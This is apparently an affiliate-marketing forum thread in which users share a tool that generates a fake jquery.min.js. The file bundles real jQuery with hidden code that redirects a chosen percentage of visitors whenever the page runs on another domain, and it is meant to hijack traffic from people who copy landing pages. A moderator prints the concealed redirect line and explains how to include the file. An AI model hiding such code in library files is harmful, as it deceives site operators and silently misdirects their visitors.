Home >
General >
Affiliate Marketing Forum
landing page script (15)
08-31-2018 08:08 AM
#1
aady83 (Member)
landing page script
Hi ,
I am looking for a script to protect my landing page. The script needs to redirect X% of traffic back to my site.
I used to have it and can't find it anywhere.
any help please?
08-31-2018 09:16 AM
#2
eurosen (AMC Alumnus)
Following as looking for the same.
08-31-2018 10:08 AM
#3
wakeboarder (Member)
I think this is the script you're looking for guys.
https://ppcmode.com/LPW/
Domain: your domain name where you are hosting the LP
Full original link: where do you want redirect the traffic
Percentage: How much % of the traffic you want to "borrow" 
08-31-2018 10:34 AM
#4
aady83 (Member)
thats the one thanks.
08-31-2018 12:49 PM
#5
CatalanWarrior (Member)
Can you explain the logic behind send back part of the traffic ? I can think of re-send to different offer or to use as "fallback" ?
Or you looking to reduce the vol in the landing page in order to not burn it ? curious.
Thanks in advance 
ri0s
08-31-2018 01:26 PM
#6
eurosen (AMC Alumnus)

Originally Posted by
ri0sss
Can you explain the logic behind send back part of the traffic ? I can think of re-send to different offer or to use as "fallback" ?
Or you looking to reduce the vol in the landing page in order to not burn it ? curious.
Thanks in advance
ri0s
You use this tool to hijack traffic when someone rips your landing page.
An X percentage of their traffic will be forwarded to the url you select, a smartlink for an example.
Very sneaky but just about as sneaky as stealing someone elses lander.
With regards to sending back part of the traffic... You pick a percentage of how many visitors on that ripped lander you want to send to the url you have picked.
The higher the more profit, but the more chance that you are being caught or that the person who rips the landers decides to stop it due to low performance.
09-01-2018 12:57 PM
#7
eurosen (AMC Alumnus)

Originally Posted by
wakeboarder
I think this is the script you're looking for guys.
https://ppcmode.com/LPW/
Domain: your domain name where you are hosting the LP
Full original link: where do you want redirect the traffic
Percentage: How much % of the traffic you want to "borrow"

In what format do you add your domain?
https://www.domain.com or just domain.com?
Thanks
09-01-2018 01:05 PM
#8
wakeboarder (Member)
eurosen for your example you need to enter www.domain.com.
Please double-check it before pushing any traffic. 
09-01-2018 01:39 PM
#9
p rand (Member)
Being that I'm not a skilled coder, I have a few questions about this script. The jquery.min.js file is generated when running this app. Is this a substitute for a commonly used file that contains the redirect code that's not in the original? If so, could someone point to the lines that cause the redirect and explain how it works? I don't see any links in the file, so the action is pretty well hidden.
Also, What code would you put on the landing page to call this, and where would you place it on the page?
09-21-2018 01:14 PM
#10
eurosen (AMC Alumnus)
I have tested it with a few different domain settings but no matter what I do it keeps redirecting some of my traffic 
09-28-2018 05:04 AM
#11
erikgyepes (Moderator)
Being that I'm not a skilled coder, I have a few questions about this script. The jquery.min.js file is generated when running this app. Is this a substitute for a commonly used file that contains the redirect code that's not in the original? If so, could someone point to the lines that cause the redirect and explain how it works? I don't see any links in the file, so the action is pretty well hidden.
Also, What code would you put on the landing page to call this, and where would you place it on the page?
Yes, this pretends to be a "jQuery", it actually features a working jQuery library, but in addition it has the hijacking part hidden in.
The redirect part is around line 178 and it looks something like this:
Code:
var w=window.top.location;if(w.host!=='http://google.com'&&Math.floor(Math.random()*101)<10){w.href='http://apple.com';}
It basically checks if the current domain is the same as defined and if it's not, then the user will be redirected to another URL in x% of cases.
11-28-2018 12:57 AM
#12
yoshinaka (Member)
Hi erikgyepes, wondering if you could tell me where do i place the jquery code, do you just drag n drop the jf file to the js folder? thank you
11-28-2018 02:25 AM
#13
erikgyepes (Moderator)
Hi erikgyepes, wondering if you could tell me where do i place the jquery code, do you just drag n drop the jf file to the js folder? thank you
Basically yes.
Then you must link to that file from your landing page (index.html)
Something like:
Code:
<script src="js/jquery.min.js"></script>
P.S. I highly recommend learning some basics of HTML/CSS to be able to easily understand and edit landing pages.
11-28-2018 05:11 AM
#14
dianecyc (Member)
SO if i remove linking jquery.min.js from index.html then there is no problem with my lander?
11-28-2018 07:58 AM
#15
eurosen (AMC Alumnus)
Be careful with this script, I have not been able to make it work.
Have tried several different ways of adding my domain but none of them seem to work.
From what I could see is that this script only works on landers with http://www and not with landers with just http://
Home >
General >
Affiliate Marketing Forum